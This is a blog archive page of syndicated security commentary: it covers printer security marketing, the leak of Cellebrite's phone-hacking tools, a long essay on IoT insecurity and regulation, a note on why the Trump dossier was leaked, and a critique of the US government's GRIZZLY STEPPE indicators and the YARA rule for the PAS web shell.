Tag Archives: fbi

You don’t need printer security

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/02/you-dont-need-printer-security.html

So there’s this tweet:

What it’s probably refering to is this:

This is an obviously bad idea.

Well, not so “obvious”, so some people have ask me to clarify the situation. After all, without “security”, couldn’t a printer just be added to a botnet of IoT devices?

The answer is this:

Fixing insecurity is almost always better than adding a layer of security.

Adding security is notoriously problematic, for three reasons

  1. Hackers are active attackers. When presented with a barrier in front of an insecurity, they’ll often find ways around that barrier. It’s a common problem with “web application firewalls”, for example.
  2. The security software itself can become a source of vulnerabilities hackers can attack, which has happened frequently in anti-virus and intrusion prevention systems.
  3. Security features are usually snake-oil, sounding great on paper, with with no details, and no independent evaluation, provided to the public.

It’s the last one that’s most important. HP markets features, but there’s no guarantee they work. In particular, similar features in other products have proven not to work in the past.

HP describes its three special features in a brief whitepaper [*]. They aren’t bad, but at the same time, they aren’t particularly good. Windows already offers all these features. Indeed, as far as I know, they are just using Windows as their firmware operating system, and are just slapping an “HP” marketing name onto existing Windows functionality.

HP Sure Start: This refers to the standard feature in almost all devices these days of having a secure boot process. Windows supports this in UEFI boot. Apple’s iPhones work this way, which is why the FBI needed Apple’s help to break into a captured terrorist’s phone. It’s a feature built into most IoT hardware, though most don’t enable it in software.

Whitelisting: Their description sounds like “signed firmware updates”, but if that was they case, they’d call it that. Traditionally, “whitelisting” referred to a different feature, containing a list of hashes for programs that can run on the device. Either way, it’s a pretty common functionality.

Run-time intrusion detection: They have numerous, conflicting descriptions on their website. It may mean scanning memory for signatures of known viruses. It may mean stack cookies. It may mean double-checking kernel modules. Windows does all these things, and it has a tiny benefit on stopping security threats.

As for traditional threats for attacks against printers, none of these really are important. What you need to secure a printer is the ability to disable services you aren’t using (close ports), enable passwords and other access control, and delete files of old print jobs so hackers can’t grab them from the printer. HP has features to address these security problems, but then, so do its competitors.

Lastly, printers should be behind firewalls, not only protected from the Internet, but also segmented from the corporate network, so that only those designed ports, or flows between the printer and print servers, are enabled.

Conclusion

The features HP describes are snake oil. If they worked well, they’d still only address a small part of the spectrum of attacks against printers. And, since there’s no technical details or independent evaluation of the features, they are almost certainly lies.

If HP really cared about security, they’d make their software more secure. They use fuzzing tools like AFL to secure it. They’d enable ASLR and stack cookies. They’d compile C code with run-time buffer overflow checks. Thety’d have a bug bounty program. It’s not something they can easily market, but at least it’d be real.

If you cared about printer security, then do the steps I outline above, especially firewalling printers from the traditional network. Seriously, putting $100 firewall between a VLAN for your printers and the rest of the network is cheap and easy way to do a vast amount of security. If you can’t secure printers this way, buying snake oil features like HP describes won’t help you.

Hacker Leaks Cellebrite’s Phone-Hacking Tools

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/hacker_leaks_ce.html

In January we learned that a hacker broke into Cellebrite’s network and stole 900GB of data. Now the hacker has dumped some of Cellebrite’s phone-hacking tools on the Internet.

In their README, the hacker notes much of the iOS-related code is very similar to that used in the jailbreaking scene­a community of iPhone hackers that typically breaks into iOS devices and release its code publicly for free.

Jonathan Zdziarski, a forensic scientist, agreed that some of the iOS files were nearly identical to tools created and used by the jailbreaking community, including patched versions of Apple’s firmware designed to break security mechanisms on older iPhones. A number of the configuration files also reference “limera1n,” the name of a piece of jailbreaking software created by infamous iPhone hacker Geohot. He said he wouldn’t call the released files “exploits” however.

Zdziarski also said that other parts of the code were similar to a jailbreaking project called QuickPwn, but that the code had seemingly been adapted for forensic purposes. For example, some of the code in the dump was designed to brute force PIN numbers, which may be unusual for a normal jailbreaking piece of software.

“If, and it’s a big if, they used this in UFED or other products, it would indicate they ripped off software verbatim from the jailbreak community and used forensically unsound and experimental software in their supposedly scientific and forensically validated products,” Zdziarski continued.

If you remember, Cellebrite was the company that supposedly helped the FBI break into the San Bernadino terrorist iPhone. (I say “supposedly,” because the evidence is unclear.) We do know that they provide this sort of forensic assistance to countries like Russia, Turkey, and the UAE — as well as to many US jurisdictions.

As Cory Doctorow points out:

…suppressing disclosure of security vulnerabilities in commonly used tools does not prevent those vulnerabilities from being independently discovered and weaponized — it just means that users, white-hat hackers and customers are kept in the dark about lurking vulnerabilities, even as they are exploited in the wild, which only end up coming to light when they are revealed by extraordinary incidents like this week’s dump.

We are all safer when vulnerabilities are reported and fixed, not when they are hoarded and used in secret.

Slashdot thread.

Security and the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_th.html

Last year, on October 21, your digital video recorder ­- or at least a DVR like yours ­- knocked Twitter off the internet. Someone used your DVR, along with millions of insecure webcams, routers, and other connected devices, to launch an attack that started a chain reaction, resulting in Twitter, Reddit, Netflix, and many sites going off the internet. You probably didn’t realize that your DVR had that kind of power. But it does.

All computers are hackable. This has as much to do with the computer market as it does with the technologies. We prefer our software full of features and inexpensive, at the expense of security and reliability. That your computer can affect the security of Twitter is a market failure. The industry is filled with market failures that, until now, have been largely ignorable. As computers continue to permeate our homes, cars, businesses, these market failures will no longer be tolerable. Our only solution will be regulation, and that regulation will be foisted on us by a government desperate to “do something” in the face of disaster.

In this article I want to outline the problems, both technical and political, and point to some regulatory solutions. Regulation might be a dirty word in today’s political climate, but security is the exception to our small-government bias. And as the threats posed by computers become greater and more catastrophic, regulation will be inevitable. So now’s the time to start thinking about it.

We also need to reverse the trend to connect everything to the internet. And if we risk harm and even death, we need to think twice about what we connect and what we deliberately leave uncomputerized.

If we get this wrong, the computer industry will look like the pharmaceutical industry, or the aircraft industry. But if we get this right, we can maintain the innovative environment of the internet that has given us so much.

**********

We no longer have things with computers embedded in them. We have computers with things attached to them.

Your modern refrigerator is a computer that keeps things cold. Your oven, similarly, is a computer that makes things hot. An ATM is a computer with money inside. Your car is no longer a mechanical device with some computers inside; it’s a computer with four wheels and an engine. Actually, it’s a distributed system of over 100 computers with four wheels and an engine. And, of course, your phones became full-power general-purpose computers in 2007, when the iPhone was introduced.

We wear computers: fitness trackers and computer-enabled medical devices ­- and, of course, we carry our smartphones everywhere. Our homes have smart thermostats, smart appliances, smart door locks, even smart light bulbs. At work, many of those same smart devices are networked together with CCTV cameras, sensors that detect customer movements, and everything else. Cities are starting to embed smart sensors in roads, streetlights, and sidewalk squares, also smart energy grids and smart transportation networks. A nuclear power plant is really just a computer that produces electricity, and ­- like everything else we’ve just listed -­ it’s on the internet.

The internet is no longer a web that we connect to. Instead, it’s a computerized, networked, and interconnected world that we live in. This is the future, and what we’re calling the Internet of Things.

Broadly speaking, the Internet of Things has three parts. There are the sensors that collect data about us and our environment: smart thermostats, street and highway sensors, and those ubiquitous smartphones with their motion sensors and GPS location receivers. Then there are the “smarts” that figure out what the data means and what to do about it. This includes all the computer processors on these devices and ­- increasingly ­- in the cloud, as well as the memory that stores all of this information. And finally, there are the actuators that affect our environment. The point of a smart thermostat isn’t to record the temperature; it’s to control the furnace and the air conditioner. Driverless cars collect data about the road and the environment to steer themselves safely to their destinations.

You can think of the sensors as the eyes and ears of the internet. You can think of the actuators as the hands and feet of the internet. And you can think of the stuff in the middle as the brain. We are building an internet that senses, thinks, and acts.

This is the classic definition of a robot. We’re building a world-size robot, and we don’t even realize it.

To be sure, it’s not a robot in the classical sense. We think of robots as discrete autonomous entities, with sensors, brain, and actuators all together in a metal shell. The world-size robot is distributed. It doesn’t have a singular body, and parts of it are controlled in different ways by different people. It doesn’t have a central brain, and it has nothing even remotely resembling a consciousness. It doesn’t have a single goal or focus. It’s not even something we deliberately designed. It’s something we have inadvertently built out of the everyday objects we live with and take for granted. It is the extension of our computers and networks into the real world.

This world-size robot is actually more than the Internet of Things. It’s a combination of several decades-old computing trends: mobile computing, cloud computing, always-on computing, huge databases of personal information, the Internet of Things ­- or, more precisely, cyber-physical systems ­- autonomy, and artificial intelligence. And while it’s still not very smart, it’ll get smarter. It’ll get more powerful and more capable through all the interconnections we’re building.

It’ll also get much more dangerous.

**********

Computer security has been around for almost as long as computers have been. And while it’s true that security wasn’t part of the design of the original internet, it’s something we have been trying to achieve since its beginning.

I have been working in computer security for over 30 years: first in cryptography, then more generally in computer and network security, and now in general security technology. I have watched computers become ubiquitous, and have seen firsthand the problems ­- and solutions ­- of securing these complex machines and systems. I’m telling you all this because what used to be a specialized area of expertise now affects everything. Computer security is now everything security. There’s one critical difference, though: The threats have become greater.

Traditionally, computer security is divided into three categories: confidentiality, integrity, and availability. For the most part, our security concerns have largely centered around confidentiality. We’re concerned about our data and who has access to it ­- the world of privacy and surveillance, of data theft and misuse.

But threats come in many forms. Availability threats: computer viruses that delete our data, or ransomware that encrypts our data and demands payment for the unlock key. Integrity threats: hackers who can manipulate data entries can do things ranging from changing grades in a class to changing the amount of money in bank accounts. Some of these threats are pretty bad. Hospitals have paid tens of thousands of dollars to criminals whose ransomware encrypted critical medical files. JPMorgan Chase spends half a billion on cybersecurity a year.

Today, the integrity and availability threats are much worse than the confidentiality threats. Once computers start affecting the world in a direct and physical manner, there are real risks to life and property. There is a fundamental difference between crashing your computer and losing your spreadsheet data, and crashing your pacemaker and losing your life. This isn’t hyperbole; recently researchers found serious security vulnerabilities in St. Jude Medical’s implantable heart devices. Give the internet hands and feet, and it will have the ability to punch and kick.

Take a concrete example: modern cars, those computers on wheels. The steering wheel no longer turns the axles, nor does the accelerator pedal change the speed. Every move you make in a car is processed by a computer, which does the actual controlling. A central computer controls the dashboard. There’s another in the radio. The engine has 20 or so computers. These are all networked, and increasingly autonomous.

Now, let’s start listing the security threats. We don’t want car navigation systems to be used for mass surveillance, or the microphone for mass eavesdropping. We might want it to be used to determine a car’s location in the event of a 911 call, and possibly to collect information about highway congestion. We don’t want people to hack their own cars to bypass emissions-control limitations. We don’t want manufacturers or dealers to be able to do that, either, as Volkswagen did for years. We can imagine wanting to give police the ability to remotely and safely disable a moving car; that would make high-speed chases a thing of the past. But we definitely don’t want hackers to be able to do that. We definitely don’t want them disabling the brakes in every car without warning, at speed. As we make the transition from driver-controlled cars to cars with various driver-assist capabilities to fully driverless cars, we don’t want any of those critical components subverted. We don’t want someone to be able to accidentally crash your car, let alone do it on purpose. And equally, we don’t want them to be able to manipulate the navigation software to change your route, or the door-lock controls to prevent you from opening the door. I could go on.

That’s a lot of different security requirements, and the effects of getting them wrong range from illegal surveillance to extortion by ransomware to mass death.

**********

Our computers and smartphones are as secure as they are because companies like Microsoft, Apple, and Google spend a lot of time testing their code before it’s released, and quickly patch vulnerabilities when they’re discovered. Those companies can support large, dedicated teams because those companies make a huge amount of money, either directly or indirectly, from their software ­ and, in part, compete on its security. Unfortunately, this isn’t true of embedded systems like digital video recorders or home routers. Those systems are sold at a much lower margin, and are often built by offshore third parties. The companies involved simply don’t have the expertise to make them secure.

At a recent hacker conference, a security researcher analyzed 30 home routers and was able to break into half of them, including some of the most popular and common brands. The denial-of-service attacks that forced popular websites like Reddit and Twitter off the internet last October were enabled by vulnerabilities in devices like webcams and digital video recorders. In August, two security researchers demonstrated a ransomware attack on a smart thermostat.

Even worse, most of these devices don’t have any way to be patched. Companies like Microsoft and Apple continuously deliver security patches to your computers. Some home routers are technically patchable, but in a complicated way that only an expert would attempt. And the only way for you to update the firmware in your hackable DVR is to throw it away and buy a new one.

The market can’t fix this because neither the buyer nor the seller cares. The owners of the webcams and DVRs used in the denial-of-service attacks don’t care. Their devices were cheap to buy, they still work, and they don’t know any of the victims of the attacks. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution, because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

**********

Security is an arms race between attacker and defender. Technology perturbs that arms race by changing the balance between attacker and defender. Understanding how this arms race has unfolded on the internet is essential to understanding why the world-size robot we’re building is so insecure, and how we might secure it. To that end, I have five truisms, born from what we’ve already learned about computer and internet security. They will soon affect the security arms race everywhere.

Truism No. 1: On the internet, attack is easier than defense.

There are many reasons for this, but the most important is the complexity of these systems. More complexity means more people involved, more parts, more interactions, more mistakes in the design and development process, more of everything where hidden insecurities can be found. Computer-security experts like to speak about the attack surface of a system: all the possible points an attacker might target and that must be secured. A complex system means a large attack surface. The defender has to secure the entire attack surface. The attacker just has to find one vulnerability ­- one unsecured avenue for attack -­ and gets to choose how and when to attack. It’s simply not a fair battle.

There are other, more general, reasons why attack is easier than defense. Attackers have a natural agility that defenders often lack. They don’t have to worry about laws, and often not about morals or ethics. They don’t have a bureaucracy to contend with, and can more quickly make use of technical innovations. Attackers also have a first-mover advantage. As a society, we’re generally terrible at proactive security; we rarely take preventive security measures until an attack actually happens. So more advantages go to the attacker.

Truism No. 2: Most software is poorly written and insecure.

If complexity isn’t enough, we compound the problem by producing lousy software. Well-written software, like the kind found in airplane avionics, is both expensive and time-consuming to produce. We don’t want that. For the most part, poorly written software has been good enough. We’d all rather live with buggy software than pay the prices good software would require. We don’t mind if our games crash regularly, or our business applications act weird once in a while. Because software has been largely benign, it hasn’t mattered. This has permeated the industry at all levels. At universities, we don’t teach how to code well. Companies don’t reward quality code in the same way they reward fast and cheap. And we consumers don’t demand it.

But poorly written software is riddled with bugs, sometimes as many as one per 1,000 lines of code. Some of them are inherent in the complexity of the software, but most are programming mistakes. Not all bugs are vulnerabilities, but some are.

Truism No. 3: Connecting everything to each other via the internet will expose new vulnerabilities.

The more we network things together, the more vulnerabilities on one thing will affect other things. On October 21, vulnerabilities in a wide variety of embedded devices were all harnessed together to create what hackers call a botnet. This botnet was used to launch a distributed denial-of-service attack against a company called Dyn. Dyn provided a critical internet function for many major internet sites. So when Dyn went down, so did all those popular websites.

These chains of vulnerabilities are everywhere. In 2012, journalist Mat Honan suffered a massive personal hack because of one of them. A vulnerability in his Amazon account allowed hackers to get into his Apple account, which allowed them to get into his Gmail account. And in 2013, the Target Corporation was hacked by someone stealing credentials from its HVAC contractor.

Vulnerabilities like these are particularly hard to fix, because no one system might actually be at fault. It might be the insecure interaction of two individually secure systems.

Truism No. 4: Everybody has to stop the best attackers in the world.

One of the most powerful properties of the internet is that it allows things to scale. This is true for our ability to access data or control systems or do any of the cool things we use the internet for, but it’s also true for attacks. In general, fewer attackers can do more damage because of better technology. It’s not just that these modern attackers are more efficient, it’s that the internet allows attacks to scale to a degree impossible without computers and networks.

This is fundamentally different from what we’re used to. When securing my home against burglars, I am only worried about the burglars who live close enough to my home to consider robbing me. The internet is different. When I think about the security of my network, I have to be concerned about the best attacker possible, because he’s the one who’s going to create the attack tool that everyone else will use. The attacker that discovered the vulnerability used to attack Dyn released the code to the world, and within a week there were a dozen attack tools using it.

Truism No. 5: Laws inhibit security research.

The Digital Millennium Copyright Act is a terrible law that fails at its purpose of preventing widespread piracy of movies and music. To make matters worse, it contains a provision that has critical side effects. According to the law, it is a crime to bypass security mechanisms that protect copyrighted work, even if that bypassing would otherwise be legal. Since all software can be copyrighted, it is arguably illegal to do security research on these devices and to publish the result.

Although the exact contours of the law are arguable, many companies are using this provision of the DMCA to threaten researchers who expose vulnerabilities in their embedded systems. This instills fear in researchers, and has a chilling effect on research, which means two things: (1) Vendors of these devices are more likely to leave them insecure, because no one will notice and they won’t be penalized in the market, and (2) security engineers don’t learn how to do security better.
Unfortunately, companies generally like the DMCA. The provisions against reverse-engineering spare them the embarrassment of having their shoddy security exposed. It also allows them to build proprietary systems that lock out competition. (This is an important one. Right now, your toaster cannot force you to only buy a particular brand of bread. But because of this law and an embedded computer, your Keurig coffee maker can force you to buy a particular brand of coffee.)

**********
In general, there are two basic paradigms of security. We can either try to secure something well the first time, or we can make our security agile. The first paradigm comes from the world of dangerous things: from planes, medical devices, buildings. It’s the paradigm that gives us secure design and secure engineering, security testing and certifications, professional licensing, detailed preplanning and complex government approvals, and long times-to-market. It’s security for a world where getting it right is paramount because getting it wrong means people dying.

The second paradigm comes from the fast-moving and heretofore largely benign world of software. In this paradigm, we have rapid prototyping, on-the-fly updates, and continual improvement. In this paradigm, new vulnerabilities are discovered all the time and security disasters regularly happen. Here, we stress survivability, recoverability, mitigation, adaptability, and muddling through. This is security for a world where getting it wrong is okay, as long as you can respond fast enough.

These two worlds are colliding. They’re colliding in our cars -­ literally -­ in our medical devices, our building control systems, our traffic control systems, and our voting machines. And although these paradigms are wildly different and largely incompatible, we need to figure out how to make them work together.

So far, we haven’t done very well. We still largely rely on the first paradigm for the dangerous computers in cars, airplanes, and medical devices. As a result, there are medical systems that can’t have security patches installed because that would invalidate their government approval. In 2015, Chrysler recalled 1.4 million cars to fix a software vulnerability. In September 2016, Tesla remotely sent a security patch to all of its Model S cars overnight. Tesla sure sounds like it’s doing things right, but what vulnerabilities does this remote patch feature open up?

**********
Until now we’ve largely left computer security to the market. Because the computer and network products we buy and use are so lousy, an enormous after-market industry in computer security has emerged. Governments, companies, and people buy the security they think they need to secure themselves. We’ve muddled through well enough, but the market failures inherent in trying to secure this world-size robot will soon become too big to ignore.

Markets alone can’t solve our security problems. Markets are motivated by profit and short-term goals at the expense of society. They can’t solve collective-action problems. They won’t be able to deal with economic externalities, like the vulnerabilities in DVRs that resulted in Twitter going offline. And we need a counterbalancing force to corporate power.

This all points to policy. While the details of any computer-security system are technical, getting the technologies broadly deployed is a problem that spans law, economics, psychology, and sociology. And getting the policy right is just as important as getting the technology right because, for internet security to work, law and technology have to work together. This is probably the most important lesson of Edward Snowden’s NSA disclosures. We already knew that technology can subvert law. Snowden demonstrated that law can also subvert technology. Both fail unless each work. It’s not enough to just let technology do its thing.

Any policy changes to secure this world-size robot will mean significant government regulation. I know it’s a sullied concept in today’s world, but I don’t see any other possible solution. It’s going to be especially difficult on the internet, where its permissionless nature is one of the best things about it and the underpinning of its most world-changing innovations. But I don’t see how that can continue when the internet can affect the world in a direct and physical manner.

**********

I have a proposal: a new government regulatory agency. Before dismissing it out of hand, please hear me out.

We have a practical problem when it comes to internet regulation. There’s no government structure to tackle this at a systemic level. Instead, there’s a fundamental mismatch between the way government works and the way this technology works that makes dealing with this problem impossible at the moment.

Government operates in silos. In the U.S., the FAA regulates aircraft. The NHTSA regulates cars. The FDA regulates medical devices. The FCC regulates communications devices. The FTC protects consumers in the face of “unfair” or “deceptive” trade practices. Even worse, who regulates data can depend on how it is used. If data is used to influence a voter, it’s the Federal Election Commission’s jurisdiction. If that same data is used to influence a consumer, it’s the FTC’s. Use those same technologies in a school, and the Department of Education is now in charge. Robotics will have its own set of problems, and no one is sure how that is going to be regulated. Each agency has a different approach and different rules. They have no expertise in these new issues, and they are not quick to expand their authority for all sorts of reasons.

Compare that with the internet. The internet is a freewheeling system of integrated objects and networks. It grows horizontally, demolishing old technological barriers so that people and systems that never previously communicated now can. Already, apps on a smartphone can log health information, control your energy use, and communicate with your car. That’s a set of functions that crosses jurisdictions of at least four different government agencies, and it’s only going to get worse.

Our world-size robot needs to be viewed as a single entity with millions of components interacting with each other. Any solutions here need to be holistic. They need to work everywhere, for everything. Whether we’re talking about cars, drones, or phones, they’re all computers.

This has lots of precedent. Many new technologies have led to the formation of new government regulatory agencies. Trains did, cars did, airplanes did. Radio led to the formation of the Federal Radio Commission, which became the FCC. Nuclear power led to the formation of the Atomic Energy Commission, which eventually became the Department of Energy. The reasons were the same in every case. New technologies need new expertise because they bring with them new challenges. Governments need a single agency to house that new expertise, because its applications cut across several preexisting agencies. It’s less that the new agency needs to regulate -­ although that’s often a big part of it -­ and more that governments recognize the importance of the new technologies.

The internet has famously eschewed formal regulation, instead adopting a multi-stakeholder model of academics, businesses, governments, and other interested parties. My hope is that we can keep the best of this approach in any regulatory agency, looking more at the new U.S. Digital Service or the 18F office inside the General Services Administration. Both of those organizations are dedicated to providing digital government services, and both have collected significant expertise by bringing people in from outside of government, and both have learned how to work closely with existing agencies. Any internet regulatory agency will similarly need to engage in a high level of collaborate regulation -­ both a challenge and an opportunity.

I don’t think any of us can predict the totality of the regulations we need to ensure the safety of this world, but here’s a few. We need government to ensure companies follow good security practices: testing, patching, secure defaults -­ and we need to be able to hold companies liable when they fail to do these things. We need government to mandate strong personal data protections, and limitations on data collection and use. We need to ensure that responsible security research is legal and well-funded. We need to enforce transparency in design, some sort of code escrow in case a company goes out of business, and interoperability between devices of different manufacturers, to counterbalance the monopolistic effects of interconnected technologies. Individuals need the right to take their data with them. And internet-enabled devices should retain some minimal functionality if disconnected from the internet

I’m not the only one talking about this. I’ve seen proposals for a National Institutes of Health analog for cybersecurity. University of Washington law professor Ryan Calo has proposed a Federal Robotics Commission. I think it needs to be broader: maybe a Department of Technology Policy.

Of course there will be problems. There’s a lack of expertise in these issues inside government. There’s a lack of willingness in government to do the hard regulatory work. Industry is worried about any new bureaucracy: both that it will stifle innovation by regulating too much and that it will be captured by industry and regulate too little. A domestic regulatory agency will have to deal with the fundamentally international nature of the problem.

But government is the entity we use to solve problems like this. Governments have the scope, scale, and balance of interests to address the problems. It’s the institution we’ve built to adjudicate competing social interests and internalize market externalities. Left to their own devices, the market simply can’t. That we’re currently in the middle of an era of low government trust, where many of us can’t imagine government doing anything positive in an area like this, is to our detriment.

Here’s the thing: Governments will get involved, regardless. The risks are too great, and the stakes are too high. Government already regulates dangerous physical systems like cars and medical devices. And nothing motivates the U.S. government like fear. Remember 2001? A nominally small-government Republican president created the Office of Homeland Security 11 days after the terrorist attacks: a rushed and ill-thought-out decision that we’ve been trying to fix for over a decade. A fatal disaster will similarly spur our government into action, and it’s unlikely to be well-considered and thoughtful action. Our choice isn’t between government involvement and no government involvement. Our choice is between smarter government involvement and stupider government involvement. We have to start thinking about this now. Regulations are necessary, important, and complex; and they’re coming. We can’t afford to ignore these issues until it’s too late.

We also need to start disconnecting systems. If we cannot secure complex systems to the level required by their real-world capabilities, then we must not build a world where everything is computerized and interconnected.

There are other models. We can enable local communications only. We can set limits on collected and stored data. We can deliberately design systems that don’t interoperate with each other. We can deliberately fetter devices, reversing the current trend of turning everything into a general-purpose computer. And, most important, we can move toward less centralization and more distributed systems, which is how the internet was first envisioned.

This might be a heresy in today’s race to network everything, but large, centralized systems are not inevitable. The technical elites are pushing us in that direction, but they really don’t have any good supporting arguments other than the profits of their ever-growing multinational corporations.

But this will change. It will change not only because of security concerns, it will also change because of political concerns. We’re starting to chafe under the worldview of everything producing data about us and what we do, and that data being available to both governments and corporations. Surveillance capitalism won’t be the business model of the internet forever. We need to change the fabric of the internet so that evil governments don’t have the tools to create a horrific totalitarian state. And while good laws and regulations in Western democracies are a great second line of defense, they can’t be our only line of defense.

My guess is that we will soon reach a high-water mark of computerization and connectivity, and that afterward we will make conscious decisions about what and how we decide to interconnect. But we’re still in the honeymoon phase of connectivity. Governments and corporations are punch-drunk on our data, and the rush to connect everything is driven by an even greater desire for power and market share. One of the presentations released by Edward Snowden contained the NSA mantra: “Collect it all.” A similar mantra for the internet today might be: “Connect it all.”

The inevitable backlash will not be driven by the market. It will be deliberate policy decisions that put the safety and welfare of society above individual corporations and industries. It will be deliberate policy decisions that prioritize the security of our systems over the demands of the FBI to weaken them in order to make their law-enforcement jobs easier. It’ll be hard policy for many to swallow, but our safety will depend on it.

**********

The scenarios I’ve outlined, both the technological and economic trends that are causing them and the political changes we need to make to start to fix them, come from my years of working in internet-security technology and policy. All of this is informed by an understanding of both technology and policy. That turns out to be critical, and there aren’t enough people who understand both.

This brings me to my final plea: We need more public-interest technologists.

Over the past couple of decades, we’ve seen examples of getting internet-security policy badly wrong. I’m thinking of the FBI’s “going dark” debate about its insistence that computer devices be designed to facilitate government access, the “vulnerability equities process” about when the government should disclose and fix a vulnerability versus when it should use it to attack other systems, the debacle over paperless touch-screen voting machines, and the DMCA that I discussed above. If you watched any of these policy debates unfold, you saw policy-makers and technologists talking past each other.

Our world-size robot will exacerbate these problems. The historical divide between Washington and Silicon Valley -­ the mistrust of governments by tech companies and the mistrust of tech companies by governments ­- is dangerous.

We have to fix this. Getting IoT security right depends on the two sides working together and, even more important, having people who are experts in each working on both. We need technologists to get involved in policy, and we need policy-makers to get involved in technology. We need people who are experts in making both technology and technological policy. We need technologists on congressional staffs, inside federal agencies, working for NGOs, and as part of the press. We need to create a viable career path for public-interest technologists, much as there already is one for public-interest attorneys. We need courses, and degree programs in colleges, for people interested in careers in public-interest technology. We need fellowships in organizations that need these people. We need technology companies to offer sabbaticals for technologists wanting to go down this path. We need an entire ecosystem that supports people bridging the gap between technology and law. We need a viable career path that ensures that even though people in this field won’t make as much as they would in a high-tech start-up, they will have viable careers. The security of our computerized and networked future ­ meaning the security of ourselves, families, homes, businesses, and communities ­ depends on it.

This plea is bigger than security, actually. Pretty much all of the major policy debates of this century will have a major technological component. Whether it’s weapons of mass destruction, robots drastically affecting employment, climate change, food safety, or the increasing ubiquity of ever-shrinking drones, understanding the policy means understanding the technology. Our society desperately needs technologists working on the policy. The alternative is bad policy.

**********

The world-size robot is less designed than created. It’s coming without any forethought or architecting or planning; most of us are completely unaware of what we’re building. In fact, I am not convinced we can actually design any of this. When we try to design complex sociotechnical systems like this, we are regularly surprised by their emergent properties. The best we can do is observe and channel these properties as best we can.

Market thinking sometimes makes us lose sight of the human choices and autonomy at stake. Before we get controlled ­ or killed ­ by the world-size robot, we need to rebuild confidence in our collective governance institutions. Law and policy may not seem as cool as digital tech, but they’re also places of critical innovation. They’re where we collectively bring about the world we want to live in.

While I might sound like a Cassandra, I’m actually optimistic about our future. Our society has tackled bigger problems than this one. It takes work and it’s not easy, but we eventually find our way clear to make the hard choices necessary to solve our real problems.

The world-size robot we’re building can only be managed responsibly if we start making real choices about the interconnected world we live in. Yes, we need security systems as robust as the threat landscape. But we also need laws that effectively regulate these dangerous technologies. And, more generally, we need to make moral, ethical, and political decisions on how those systems should work. Until now, we’ve largely left the internet alone. We gave programmers a special right to code cyberspace as they saw fit. This was okay because cyberspace was separate and relatively unimportant: That is, it didn’t matter. Now that that’s changed, we can no longer give programmers and the companies they work for this power. Those moral, ethical, and political decisions need, somehow, to be made by everybody. We need to link people with the same zeal that we are currently linking machines. “Connect it all” must be countered with “connect us all.”

This essay previously appeared in New York Magazine.

A Comment on the Trump Dossier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/01/a_comment_on_th_1.html

Imagine that you are someone in the CIA, concerned about the future of America. You have this Russian dossier on Donald Trump, which you have some evidence might be true. The smartest thing you can do is to leak it to the public. By doing so, you are eliminating any leverage Russia has over Trump and probably reducing the effectiveness of any other blackmail material any government might have on Trump. I believe you do this regardless of whether you ultimately believe the document’s findings or not, and regardless of whether you support or oppose Trump. It’s simple game-theory.

This document is particularly safe to release. Because it’s not a classified report of the CIA, leaking it is not a crime. And you release it now, before Trump becomes president, because doing so afterwards becomes much more dangerous.

MODERATION NOTE: Please keep comments focused on this particular point. More general comments, especially uncivil comments, will be deleted.

Some notes on IoCs

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/12/some-notes-on-iocs.html

Obama “sanctioned” Russia today for those DNC/election hacks, kicking out 35 diplomats (**), closing diplomatic compounds (**), seizing assets of named individuals/groups (***). They also published “IoCs” of those attacks, fingerprints/signatures that point back to the attackers, like virus patterns, file hashes, and IP addresses.

These IoCs are of low quality. They are published as a political tool, to prove they have evidence pointing to Russia. They have limited utility to defenders, or those publicly analyzing attacks.

Consider the Yara rule included in US-CERT’s “GRIZZLY STEPPE” announcement:

What is this? What does this mean? What do I do with this information?

It’s a YARA rule. YARA is a tool ostensibly for malware researchers, to quickly classify files. It’s not really an anti-virus product designed to prevent or detect an intrusion/infection, but to analyze an intrusion/infection afterward — such as attributing the attack. Signatures like this will identify a well-known file found on infected/hacked systems.

What this YARA rule detects is, as the name suggests, the “PAS TOOL WEB KIT”, a web shell tool that’s popular among Russia/Ukraine hackers. If you google “PAS TOOL PHP WEB KIT”, the second result points to the tool in question. You can download a copy here [*], or you can view it on GitHub here [*].

Once a hacker gets comfortable with a tool, they tend to keep using it. That implies the YARA rule is useful at tracking the activity of that hacker, to see which other attacks they’ve been involved in, since it will find the same web shell on all the victims.

The problem is that this P.A.S. web shell is popular, used by hundreds if not thousands of hackers, mostly associated with Russia, but also throughout the rest of the world (judging by hacker forum posts). This makes using the YARA signature for attribution problematic: just because you found P.A.S. in two different places doesn’t mean it’s the same hacker.

A web shell, by the way, is one of the most common things hackers use once they’ve broken into a server. It allows further hacking and exfiltration traffic to appear as normal web requests. It typically consists of a script file (PHP, ASP, PERL, etc.) that forwards commands to the local system. There are hundreds of popular web shells in use.

We have little visibility into how the government used these IoCs. IP addresses and YARA rules like this are weak, insufficient for attribution by themselves. On the other hand, if they’ve got web server logs from multiple victims where commands from those IP addresses went to this specific web shell, then the attribution would be strong that all these attacks are by the same actor.

In other words, these rules can be a reflection of the fact the government has excellent information for attribution. Or, it could be a reflection that they’ve got only weak bits and pieces. It’s impossible for us outsiders to tell. IoCs/signatures are fetishized in the cybersecurity community: they love the small rule, but they ignore the complexity and context around the rules, often misunderstanding what’s going on. (I’ve written thousands of the things — I’m constantly annoyed by the ignorance among those not understanding what they mean).

I see on twitter people praising the government for releasing these IoCs. What I’m trying to show here is that I’m not nearly as enthusiastic about their quality.


Note#1: BTW, the YARA rule has to trigger on the PHP statements, not on the imbedded BASE64 encoded stuff. That’s because it’s encrypted with a password, so could be different for every hacker.

Note#2: Yes, the hackers who use this tool can evade detection by minor changes that avoid this YARA rule. But that’s not a concern — the point is to track the hacker using this tool across many victims, to attribute attacks. The point is not to act as an anti-virus/intrusion-detection system that triggers on “signatures”.

Note#3: Publishing the YARA rule burns it. The hackers it detects will presumably move to different tools, like PASv4 instead of PASv3. Presumably, the FBI/NSA/etc. have a variety of YARA rules for various web shells used by know active hackers, to attribute attacks to various groups. They aren’t publishing these because they want to avoid burning those rules.

Note#4: The PDF from the DHS has pretty diagrams about the attacks, but it doesn’t appears this web shell was used in any of them. It’s difficult to see where it fits in the overall picture.


